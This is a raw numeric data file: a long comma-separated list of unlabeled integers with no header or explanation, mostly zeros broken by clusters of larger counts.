0, 0, 10, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 1, 1, 0, 0, 87, 187, 283, 0, 0, 0, 0, 4, 6, 0, 60, 28, 287, 96, 132, 92, 0, 0, 447, 0, 29, 0, 0, 0, 2, 103, 0, 0, 0, 380, 0, 12, 25, 527, 278, 0, 0, 0, 0, 13, 0, 0, 0, 133, 24, 0, 0, 0, 0, 123, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 44, 0, 0, 1, 0, 0, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 2, 111, 36, 0, 251, 150, 0, 0, 0, 16, 3, 0, 11, 113, 263, 77, 257, 105, 0, 0, 427, 6, 18, 0, 0, 0, 0, 89, 0, 0, 0, 479, 24, 25, 2, 1, 390, 0, 0, 0, 0, 14, 0, 0, 0, 0, 180, 0, 0, 0, 0, 199, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 71, 22, 0, 2, 1, 223, 350, 0, 0, 38, 185, 2, 23, 4017, 200, 0, 250, 121, 0, 0, 521, 416, 0, 0, 0, 11, 118, 34, 0, 2, 0, 546, 29, 2, 3, 1, 449, 0, 0, 1, 8, 5, 1, 0, 1, 0, 151, 0, 0, 0, 0, 9, 153, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 0, 0, 0, 18, 18, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 24, 97, 0, 0, 0, 1, 93, 112, 263, 39, 90, 202, 59, 10, 76, 227, 0, 195, 161, 0, 0, 0, 515, 3, 20, 39, 199, 0, 0, 0, 5, 0, 531, 1, 3, 0, 2, 147, 314, 0, 0, 13, 1, 1, 1, 0, 0, 230, 0, 0, 0, 0, 121, 222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 33, 0, 0, 0, 1, 0, 16, 22, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 71, 79, 0, 0, 0, 0, 32, 55, 0, 326, 1, 288, 205, 226, 188, 512, 422, 255, 443, 1631, 0, 0, 242, 323, 104, 15, 0, 219, 0, 6, 0, 9, 0, 460, 1, 3, 2, 0, 3, 442, 2, 3, 36, 0, 0, 2, 0, 0, 191, 3, 55, 89, 95, 35, 88, 35, 0, 0, 0, 0, 0, 0, 0, 0, 35, 0, 0, 0, 0, 27, 26, 54, 241, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 95, 27, 0, 0, 0, 0, 0, 47, 18, 115, 114, 239, 271, 14, 0, 45, 99, 169, 105, 385, 110, 0, 0, 444, 0, 0, 1, 2, 310, 0, 0, 0, 0, 1, 731, 937, 11, 1, 0, 0, 159, 347, 12, 31, 0, 6, 0, 1, 80, 495, 208, 188, 0, 0, 0, 0, 
102, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 21, 40, 31, 448, 188, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 17, 100, 96, 99, 93, 64, 2, 0, 0, 0, 0, 0, 0, 140, 213, 1426, 3419, 2820, 1811, 1447, 1445, 1567, 1412, 1400, 1055, 2503, 172, 6, 3, 493, 2, 1, 0, 0, 300, 41, 24, 0, 15, 592, 1055, 1081, 1591, 540, 1163, 0, 200, 350, 35, 27, 34, 23, 99, 89, 470, 60, 128, 46, 0, 0, 0, 0, 89, 50, 0, 0, 0, 0, 0, 0, 0, 41, 29, 48, 19, 366, 814, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 38, 0, 12, 34, 0, 85, 91, 95, 74, 67, 3, 0, 0, 0, 3, 0, 0, 1, 0, 70, 80, 29, 17, 432, 523, 724, 3, 1, 100, 165, 446, 167, 2957, 368, 46, 1, 465, 6, 29, 11, 97, 2446, 970, 65, 21, 19, 599, 80, 6, 476, 248, 325, 1020, 504, 299, 67, 152, 81, 0, 174, 360, 68, 0, 71, 3, 0, 0, 0, 0, 0, 248, 44, 0, 0, 0, 0, 0, 26, 527, 1335, 857, 527, 227, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 238, 28, 10, 26, 137, 92, 83, 81, 9, 15, 158, 85, 87, 94, 224, 113, 120, 127, 127, 131, 52, 0, 0, 546, 357, 1713, 1015, 1748, 880, 933, 968, 1361, 2581, 2788, 1927, 1570, 1989, 1593, 1381, 1421, 1670, 3442, 2235, 2209, 2988, 3178, 2105, 0, 498, 1037, 1340, 190, 1365, 1476, 86, 271, 13, 138, 747, 1658, 493, 0, 0, 37, 2, 1, 0, 0, 0, 0, 0, 306, 73, 0, 0, 22, 39, 493, 569, 0, 0, 0, 0, 49, 27, 0, 0, 0, 0, 0, 0, 0, 0, 0, 31, 0, 0, 0, 0, 0, 0, 0, 0, 68, 179, 0, 1, 83, 79, 1, 144, 151, 106, 0, 1058, 0, 0, 29, 315, 754, 699, 594, 673, 958, 620, 383, 333, 42, 0, 0, 140, 194, 596, 235, 200, 148, 1016, 52, 344, 0, 0, 645, 69, 3676, 3893, 139, 570, 970, 1003, 308, 360, 756, 1804, 397, 49, 445, 204, 1390, 250, 251, 80, 0, 0, 78, 0, 5, 1, 0, 0, 0, 4, 191, 82, 25, 33, 12, 506, 540, 18, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 100, 28, 117, 36, 185, 162, 243, 397, 220, 518, 942, 419, 9564, 370, 815, 730, 483, 31, 143, 0, 0, 123, 130, 104, 1221, 16, 0, 0, 136, 77, 402, 27, 19, 15, 1040, 4, 384, 1, 0, 686, 3, 1875, 497, 70, 72, 1157, 990, 18, 5, 7, 928, 1065, 1569, 2374, 1347, 278, 5, 
258, 134, 0, 0, 180, 2, 19, 144, 0, 0, 9, 23, 32, 159, 124, 0, 262, 375, 66, 27, 27, 0, 0, 0, 0, 49, 0, 0, 0, 9, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 17, 99, 3, 0, 179, 271, 0, 0, 37, 109, 0, 262, 1, 0, 0, 0, 369, 75, 78, 23, 193, 0, 0, 0, 808, 421, 1956, 121, 0, 274, 211, 151, 726, 272, 22, 110, 715, 22, 408, 7, 6, 519, 9, 1869, 179, 219, 273, 191, 838, 1015, 1, 1143, 1813, 6, 13, 427, 24, 159, 47, 231, 169, 98, 721, 241, 214, 23, 150, 6, 38, 40, 31, 9, 118, 156, 423, 231, 0, 0, 0, 35, 0, 0, 0, 0, 49, 26, 0, 9, 0, 5, 8, 5, 8, 1, 0, 0, 0, 8, 35, 68, 106, 2, 186, 185, 46, 59, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 354, 0, 109, 13, 180, 3, 0, 0, 567, 625, 615, 721, 5, 46, 193, 63, 613, 273, 77, 30, 1057, 228, 373, 4, 168, 613, 0, 675, 1648, 876, 87, 705, 486, 3246, 1451, 808, 2315, 11, 279, 1853, 129, 439, 257, 135, 244, 99, 1360, 1594, 1172, 401, 835, 45, 8, 78, 10, 119, 617, 446, 0, 0, 0, 0, 0, 126, 0, 0, 0, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 8, 8, 8, 18, 70, 126, 83, 40, 50, 223, 185, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 340, 173, 103, 0, 28, 145, 0, 0, 312, 458, 1747, 1481, 197, 96, 524, 26, 875, 547, 0, 63, 1230, 536, 498, 161, 5160, 87, 636, 1522, 4948, 5191, 13106, 8359, 24032, 15732, 24340, 7017, 756, 18, 644, 2477, 923, 0, 162, 278, 11786, 739, 1995, 4575, 2046, 1078, 16, 22, 465, 67, 600, 1063, 1552, 30, 1, 0, 0, 0, 0, 52, 2, 0, 0, 0, 0, 71, 0, 0, 75, 0, 0, 0, 0, 1, 0, 67, 162, 97, 0, 0, 44, 57, 25, 51, 65, 129, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 423, 74, 2, 0, 0, 165, 416, 368, 629, 621, 3103, 1832, 5061, 1407, 1454, 1674, 1870, 1559, 1176, 1284, 2386, 2230, 2896, 1614, 2937, 2151, 2092, 1014, 1976, 3342, 11396, 20286, 27802, 18490, 25632, 9056, 2560, 605, 555, 5264, 2122, 2085, 2895, 2100, 3207, 1599, 1787, 3149, 24, 53, 0, 922, 2043, 1241, 294, 4414, 2760, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 126, 0, 411, 148, 0, 0, 1, 0, 0, 159, 143, 0, 0, 0, 0, 25, 13, 0, 0, 35, 64, 18, 52, 55, 50, 0, 0, 0, 0, 0, 0, 430, 0, 0, 0, 3, 677, 404, 0, 302, 42, 44, 38, 1833, 751, 1421, 111, 399, 
4, 1, 0, 456, 130, 801, 386, 1, 711, 10609, 739, 649, 8441, 16697, 32814, 24246, 19164, 9082, 6336, 7137, 3759, 2735, 6293, 4711, 230, 877, 4951, 3158, 1244, 67, 214, 101, 42, 160, 6893, 5320, 125, 128, 712, 175, 29, 0, 0, 0, 0, 0, 9, 35, 0, 0, 0, 164, 0, 0, 1, 382, 16, 3, 2, 1, 147, 48, 0, 0, 2, 0, 0, 0, 0, 0, 0, 20, 54, 0, 0, 0, 5, 59, 61, 61, 37, 0, 0, 431, 0, 0, 0, 453, 187, 0, 0, 337, 0, 0, 0, 39, 981, 1446, 37, 384, 0, 5, 12, 525, 180, 1897, 3880, 3163, 5005, 6395, 3423, 3296, 14512, 4019, 17066, 5370, 18497, 6851, 5956, 8107, 7573, 62416, 10825, 1243, 1801, 1667, 1156, 1370, 654, 125, 431, 20, 1938, 1440, 2345, 2336, 1820, 838, 42, 39, 28, 0, 0, 0, 0, 0, 0, 44, 0, 0, 0, 258, 0, 0, 353, 237, 819, 135, 18, 164, 13, 0, 0, 0, 0, 8, 360, 354, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 28, 69, 66, 480, 12, 0, 0, 502, 166, 29, 127, 500, 0, 0, 0, 0, 935, 388, 137, 284, 3, 14, 0, 458, 552, 934, 3654, 143, 1, 844, 602, 168, 15698, 4864, 24637, 20190, 42989, 12015, 34772, 36110, 39954, 30017, 18860, 1184, 323, 60, 47, 522, 5801, 335, 1714, 3784, 344, 3, 1402, 836, 13997, 2350, 108, 2, 1, 2, 1, 0, 0, 0, 0, 35, 0, 0, 6, 192, 0, 0, 353, 358, 211, 381, 383, 0, 0, 3, 320, 365, 336, 315, 233, 355, 302, 0, 0, 1, 74, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 436, 48, 57, 48, 381, 157, 0, 0, 344, 2, 0, 0, 0, 914, 770, 174, 741, 351, 1190, 397, 1369, 1810, 342, 3742, 84, 93, 1385, 2965, 2077, 8743, 13799, 126023, 87287, 33288, 19933, 38810, 18770, 7810, 2879, 848, 52, 355, 139, 255, 1325, 1394, 2356, 880, 13, 665, 15, 9810, 19321, 12327, 353, 376, 80, 76, 0, 0, 0, 0, 0, 0, 41, 0, 0, 268, 14, 0, 0, 318, 0, 82, 127, 225, 531, 839, 686, 897, 298, 312, 305, 285, 287, 447, 735, 405, 402, 485, 659, 1, 6, 538, 589, 593, 648, 612, 623, 682, 882, 390, 424, 445, 664, 268, 62, 71, 380, 95, 119, 109, 254, 756, 1520, 4083, 2879, 1878, 3051, 1870, 4363, 10848, 2606, 3965, 1081, 634, 242, 863, 357, 6285, 3910, 73097, 14112, 14324, 878, 3267, 2279, 594, 558, 232, 54, 320, 171, 374, 2707, 1900, 416, 260, 13, 335, 
887, 1182, 83, 1380, 41, 51, 0, 32, 0, 0, 0, 0, 0, 0, 584, 92, 0, 0, 0, 0, 0, 2, 113, 97, 0, 0, 0, 77, 19, 6, 0, 0, 0, 0, 0, 158, 0, 0, 0, 34, 167, 643, 586, 352, 0, 0, 0, 0, 0, 0, 424, 0, 0, 124, 376, 440, 421, 549, 1874, 968, 1924, 1185, 1772, 3229, 3420, 4140, 1962, 164, 725, 668, 1484, 480, 1006, 2664, 639, 1299, 1147, 1975, 878, 14727, 2158, 13396, 17193, 14583, 42, 1560, 1494, 4838, 1458, 4053, 3916, 932, 3129, 3659, 325, 266, 76, 16, 0, 243, 260, 1076, 120, 336, 36, 32, 0, 25, 0, 0, 0, 0, 0, 0, 130, 8, 0, 0, 0, 0, 0, 71, 69, 0, 0, 0, 0, 94, 2, 0, 0, 0, 0, 0, 0, 89, 0, 0, 0, 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 200, 1, 1, 100, 267, 859, 1, 895, 2792, 1062, 1444, 1, 227, 303, 605, 2155, 4821, 4120, 3317, 4549, 7358, 4508, 5736, 7440, 7871, 2832, 2148, 3499, 2000, 9514, 4899, 7988, 7405, 22324, 4085, 4442, 3343, 2638, 4211, 4209, 1525, 3195, 6804, 1484, 572, 188, 7, 44, 2, 95, 10, 1136, 226, 517, 0, 30, 0, 20, 0, 0, 0, 0, 46, 147, 19, 0, 0, 0, 0, 0, 0, 112, 0, 0, 0, 0, 0, 77, 0, 0, 0, 0, 0, 0, 1, 163, 1, 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 187, 0, 0, 114, 207, 537, 132, 315, 1728, 368, 842, 597, 1608, 203, 271, 833, 1990, 791, 893, 444, 1208, 21, 557, 805, 2726, 511, 2531, 4958, 1725, 6597, 1, 2618, 2940, 16275, 1254, 1150, 733, 447, 1427, 3855, 1248, 854, 26, 1499, 174, 0, 0, 52, 0, 70, 19, 1837, 557, 256, 50, 56, 0, 23, 0, 0, 0, 65, 116, 7, 0, 0, 0, 0, 0, 0, 0, 87, 0, 0, 0, 0, 68, 64, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 30, 1, 0, 0, 0, 0, 0, 3, 26, 2, 7, 6, 228, 0, 0, 19, 64, 373, 126, 306, 1127, 1351, 98, 48, 105, 0, 1, 813, 1321, 701, 748, 259, 879, 115, 628, 564, 94, 3105, 8995, 1381, 2291, 7173, 154, 4629, 2929, 9189, 1079, 2999, 2513, 2720, 2981, 39, 53, 485, 35, 54, 46, 133, 22, 63, 11, 93, 16, 862, 376, 465, 241, 338, 211, 295, 106, 61, 41, 178, 37, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 23, 24, 16, 0, 0, 0, 0, 0, 5, 10, 0, 0, 0, 1, 198, 0, 0, 0, 178, 183, 519, 1117, 1908, 998, 1268, 995, 943, 1073, 1499, 2844, 4610, 4490, 
1240, 1416, 1685, 699, 1344, 1400, 1265, 4979, 1048, 1206, 1568, 7033, 354, 4065, 848, 7782, 471, 2362, 2959, 413, 1501, 509, 2313, 1114, 92, 234, 147, 93, 0, 37, 16, 58, 19, 940, 0, 39, 110, 32, 1, 1, 234, 12, 0, 147, 338, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 8, 0, 1, 2, 0, 0, 0, 0, 0, 29, 0, 0, 0, 0, 19, 199, 0, 0, 30, 206, 103, 174, 906, 836, 78, 110, 290, 247, 5, 1, 1286, 1738, 89, 50, 17, 227, 36, 668, 14, 944, 3354, 2233, 2014, 2063, 7910, 2883, 6373, 2717, 7667, 4432, 1463, 3013, 956, 1381, 123, 654, 519, 0, 109, 1, 6, 0, 0, 66, 0, 660, 315, 0, 13, 56, 33, 0, 0, 268, 30, 29, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 18, 11, 0, 0, 1, 2, 0, 0, 0, 0, 165, 0, 0, 0, 0, 6, 217, 0, 0, 0, 0, 162, 399, 478, 1104, 760, 348, 390, 695, 204, 1301, 3619, 1789, 6, 0, 1, 66, 0, 611, 220, 733, 2315, 77, 0, 403, 6322, 182, 2107, 1700, 7330, 4835, 2672, 5823, 2054, 2616, 640, 172, 1571, 1, 60, 0, 4, 0, 0, 50, 0, 981, 0, 0, 0, 0, 38, 0, 0, 104, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 2, 1, 0, 0, 0, 23, 0, 0, 0, 0, 17, 204, 0, 0, 0, 0, 279, 236, 692, 1514, 767, 0, 51, 77, 263, 518, 4852, 3189, 12, 22, 21, 216, 7, 1785, 1824, 434, 2616, 117, 0, 204, 6416, 125, 1521, 2418, 4175, 5985, 2477, 2730, 919, 999, 59, 192, 1093, 0, 103, 0, 0, 5, 0, 57, 856, 176, 0, 0, 0, 0, 27, 0, 0, 92, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 47, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 0, 2, 1, 0, 0, 32, 0, 0, 0, 0, 34, 183, 16, 12, 19, 84, 490, 521, 841, 1145, 870, 384, 987, 460, 1403, 2500, 2227, 3506, 416, 323, 521, 377, 161, 1340, 1986, 0, 2388, 82, 39, 444, 6604, 1400, 2158, 690, 975, 6826, 1376, 587, 563, 754, 1719, 304, 1116, 0, 171, 26, 0, 4, 0, 129, 952, 0, 0, 0, 0, 0, 21, 0, 0, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 2, 0, 0, 0, 0, 2, 0, 0, 9, 6, 10, 13, 14, 16, 178, 0, 0, 0, 0, 455, 458, 181, 433, 566, 206, 2, 98, 235, 90, 250, 
2346, 315, 786, 383, 611, 69, 2874, 1478, 156, 2537, 4, 321, 929, 6814, 3653, 1211, 141, 140, 7462, 943, 634, 929, 601, 149, 113, 1301, 10, 0, 140, 18, 160, 318, 2555, 58, 0, 0, 0, 0, 29, 21, 0, 0, 93, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 11, 188, 0, 0, 0, 0, 641, 607, 163, 320, 671, 54, 40, 148, 313, 123, 452, 1457, 3507, 2052, 564, 1001, 529, 1809, 454, 851, 4874, 1323, 1371, 2935, 7811, 1347, 3853, 1948, 933, 6786, 2332, 1723, 1520, 997, 587, 628, 3067, 1889, 2099, 1644, 603, 807, 6025, 12524, 49161, 920, 5148, 36, 10, 0, 21, 0, 0, 161, 0, 0, 0, 17, 7, 8, 4, 7, 0, 0, 14, 88, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 7, 180, 2, 10, 5, 53, 868, 1242, 318, 254, 765, 73, 57, 105, 261, 364, 1192, 1330, 2158, 837, 1785, 3090, 2772, 1394, 1044, 1402, 3946, 2335, 1628, 2672, 12667, 1945, 1620, 804, 858, 7834, 1651, 1215, 1556, 692, 419, 377, 1117, 307, 1999, 305, 1755, 2069, 3429, 3199, 2165, 3290, 417, 2555, 70, 83, 189, 68, 28, 599, 368, 146, 195, 1, 0, 0, 0, 0, 8, 25, 7, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 25, 27, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 182, 12, 0, 0, 0, 406, 911, 681, 647, 935, 154, 506, 213, 343, 82, 1167, 815, 73, 119, 0, 364, 62, 487, 282, 457, 2718, 1847, 1444, 2997, 4745, 3372, 2477, 5871, 6086, 16544, 12037, 18360, 63, 70, 0, 3, 644, 942, 2247, 2, 124, 67, 75, 1, 0, 0, 234, 5838, 16, 0, 42, 83, 51, 0, 0, 0, 86, 3, 0, 0, 0, 0, 0, 0, 0, 57, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, 29, 0, 0, 0, 0, 0, 0, 0, 0, 2, 171, 0, 0, 0, 1, 0, 689, 328, 248, 324, 162, 316, 2, 283, 37, 3136, 3738, 546, 364, 329, 547, 278, 3997, 5844, 2435, 5366, 8177, 9776, 7643, 10091, 51306, 11277, 6473, 4260, 6148, 10014, 1949, 0, 69, 1, 0, 603, 222, 3739, 96, 26, 134, 0, 0, 0, 0, 182, 1790, 3, 0, 25, 0, 0, 0, 0, 0, 62, 10, 8, 0, 0, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 0, 0, 0, 
0, 0, 0, 1, 0, 185, 0, 0, 0, 0, 2, 783, 220, 352, 149, 70, 320, 187, 277, 1, 795, 1212, 594, 569, 725, 1034, 601, 5887, 3020, 1365, 1433, 147, 1435, 268, 1358, 2899, 786, 56, 212, 3443, 885, 119, 0, 68, 0, 0, 639, 233, 1555, 333, 3235, 745, 10, 0, 0, 0, 13, 33, 20, 5, 77, 0, 0, 0, 0, 0, 78, 0, 0, 0, 0, 0, 0, 0, 0, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 2, 0, 0, 0, 0, 0, 0, 0, 214, 0, 0, 0, 0, 520, 801, 386, 506, 79, 13, 201, 2241, 477, 588, 678, 710, 35, 15, 16, 865, 69, 2595, 1814, 285, 574, 305, 725, 1409, 4798, 728, 371, 806, 1401, 3946, 1048, 449, 238, 550, 399, 793, 2134, 15446, 4659, 314, 173, 220, 55, 0, 4, 3, 0, 23, 20, 0, 49, 0, 0, 0, 0, 0, 37, 0, 0, 0, 0, 0, 0, 0, 0, 54, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 1, 3, 0, 0, 0, 0, 0, 43, 326, 43, 26, 26, 23, 29, 905, 340, 193, 356, 325, 751, 517, 686, 487, 151, 781, 149, 45, 198, 516, 966, 843, 366, 211, 783, 374, 152, 6259, 801, 2721, 209, 92, 3907, 2080, 2722, 7, 0, 91, 57, 1715, 217, 5, 739, 147, 23, 9, 10, 0, 0, 2, 1, 4, 1067, 17, 30, 2, 2, 1, 2, 2, 48, 2, 0, 0, 0, 0, 0, 0, 0, 55, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 26, 0, 2, 63, 100, 31, 34, 74, 50, 212, 16, 0, 0, 5, 6, 590, 514, 86, 75, 33, 546, 22, 141, 0, 157, 1261, 357, 595, 392, 634, 209, 2750, 441, 359, 269, 324, 3414, 1316, 116, 459, 8421, 6433, 1791, 2687, 2537, 1635, 1441, 1311, 226, 1789, 1166, 376, 215, 156, 0, 3, 0, 1, 0, 0, 0, 0, 16, 9, 20, 0, 0, 0, 0, 0, 44, 1, 2, 47, 46, 1, 2, 1, 2, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 5, 0, 2, 9, 0, 7, 14, 0, 178, 24, 0, 0, 9, 14, 446, 703, 635, 3007, 2143, 1873, 993, 4872, 2032, 145, 2298, 3463, 588, 402, 82, 456, 3787, 969, 101, 182, 2044, 3115, 2357, 42, 81, 2282, 14232, 22732, 9850, 1487, 258, 146, 552, 1810, 2255, 862, 161, 222, 8, 0, 0, 0, 0, 0, 1, 0, 0, 14, 42, 19, 0, 0, 0, 0, 0, 46, 0, 0, 14, 22, 0, 0, 0, 0, 58, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 6, 0, 4, 13, 
7, 0, 0, 78, 157, 0, 0, 28, 325, 359, 154, 70, 95, 211, 1149, 707, 2222, 1430, 1157, 2283, 3813, 2855, 3222, 1663, 1393, 6682, 2815, 2730, 3388, 1550, 865, 488, 1718, 1481, 4705, 13, 1378, 1935, 1035, 1035, 126, 523, 496, 803, 86, 655, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 28, 0, 0, 0, 0, 0, 0, 60, 13, 23, 3, 0, 0, 0, 0, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 23, 24, 62, 19, 0, 0, 0, 0, 325, 33, 80, 281, 123, 405, 0, 118, 86, 109, 194, 0, 193, 73, 88, 624, 453, 1427, 996, 527, 47, 3671, 0, 404, 477, 1340, 537, 439, 549, 4963, 232, 322, 318, 1812, 1046, 742, 1201, 2424, 1715, 736, 0, 16, 685, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 0, 0, 0, 25, 0, 0, 0, 0, 0, 0, 0, 0, 62, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 72, 80, 46, 0, 4, 0, 0, 0, 0, 407, 217, 119, 45, 333, 82, 260, 155, 281, 316, 163, 376, 167, 525, 3615, 5885, 4868, 3739, 3729, 17959, 5455, 625, 797, 604, 561, 0, 1, 2088, 165, 1309, 963, 422, 726, 144, 94, 103, 214, 322, 0, 0, 0, 187, 1151, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 24, 0, 0, 0, 0, 0, 68, 0, 0, 0, 0, 0, 0, 0, 5, 59, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 105, 44, 13, 12, 39, 2, 3, 0, 0, 294, 167, 229, 174, 14, 121, 0, 65, 11, 212, 100, 0, 185, 4, 433, 2177, 144, 175, 116, 472, 586, 2636, 0, 0, 0, 133, 318, 1801, 161, 212, 435, 951, 1296, 1190, 43, 94, 1, 177, 407, 0, 0, 0, 4, 100, 576, 473, 469, 448, 450, 444, 432, 418, 414, 450, 465, 747, 452, 491, 201, 43, 67, 0, 0, 148, 390, 384, 378, 41, 170, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 13, 21, 52, 21, 4, 0, 45, 0, 3, 3, 416, 94, 42, 0, 40, 157, 346, 335, 1016, 502, 694, 543, 606, 673, 346, 612, 1991, 1035, 1182, 1070, 1248, 1165, 3672, 1767, 1575, 1538, 1649, 2198, 236, 820, 1160, 604, 398, 1463, 1137, 8, 0, 0, 295, 246, 0, 0, 0, 1, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 86, 0, 10, 283, 430, 423, 417, 410, 278, 9, 0, 20, 396, 522, 327, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 379, 1688, 449, 
47, 0, 0, 0, 10, 40, 16, 406, 9, 6, 5, 0, 0, 0, 19, 2636, 4118, 63, 119, 54, 0, 159, 5, 84, 1272, 60, 309, 11, 24, 0, 399, 0, 0, 0, 263, 95, 1375, 656, 15, 16, 297, 1463, 551, 703, 21, 396, 163, 0, 0, 0, 0, 0, 0, 0, 0, 0, 14, 13, 0, 0, 0, 0, 0, 0, 110, 13, 13, 13, 10, 39, 7, 70, 158, 0, 0, 0, 0, 175, 0, 7, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 22, 0, 0, 0, 0, 0, 0, 62, 464, 0, 4, 12, 0, 0, 0, 0, 184, 1494, 646, 142, 107, 0, 0, 164, 0, 80, 776, 0, 117, 0, 195, 312, 1216, 0, 0, 6, 12238, 1491, 201, 0, 40, 14, 91, 295, 52, 601, 1349, 107, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 27, 102, 0, 0, 0, 0, 0, 0, 63, 0, 0, 0, 0, 25, 8, 11, 0, 0, 0, 0, 0, 157, 0, 40, 5, 47, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 282, 281, 0, 5, 3, 0, 0, 0, 0, 0, 0, 56, 50, 7, 1, 0, 82, 0, 62, 772, 0, 179, 7, 19, 913, 70, 73, 0, 0, 32, 14, 98, 68, 22, 0, 62, 303, 248, 255, 798, 1114, 56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 10, 138, 0, 0, 0, 0, 2, 6, 87, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 125, 33, 0, 0, 0, 0, 28, 36, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 124, 329, 252, 589, 126, 7, 0, 0, 0, 0, 0, 0, 0, 95, 9, 0, 5, 0, 60, 0, 51, 608, 0, 166, 0, 14, 36, 4, 65, 0, 0, 0, 0, 0, 0, 0, 0, 106, 338, 390, 260, 784, 128, 961, 181, 0, 0, 0, 0, 0, 